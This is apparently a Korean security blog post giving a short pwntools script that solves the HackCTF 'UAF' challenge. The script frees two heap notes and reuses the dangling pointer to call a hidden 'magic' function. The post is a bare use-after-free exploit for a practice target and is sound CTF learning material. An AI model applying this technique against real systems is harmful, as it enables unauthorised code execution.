ii4gsp

HackCTF - UAF 본문

시스템 해킹/HackCTF

HackCTF - UAF

ii4gsp 2020. 2. 19. 18:23

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3020)
e = ELF('./uaf')

magic = e.symbols['magic']

def add_note(idx, size):
    print r.recv()
    r.sendline('1')
    print r.recv()
    r.sendline(idx)
    print r.recv()
    r.sendline(size)

def del_note(idx):
    print r.recv()
    r.sendline('2')
    r.sendline(idx)
    print r.recv()

def print_note(idx):
    print r.recv()
    r.sendline('3')
    print r.recv()
    r.sendline(idx)

add_note('100', '')
add_note('100', '')
del_note('0')
del_note('1')

add_note('8', p32(magic))

print_note('0')

r.interactive()

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - You are silver  (0) 2020.03.05
HackCTF - ROP  (0) 2020.02.21
HackCTF - Pwning  (0) 2020.02.19
HackCTF - Gift  (0) 2020.02.18
HackCTF - Look at me  (0) 2020.02.17
Comments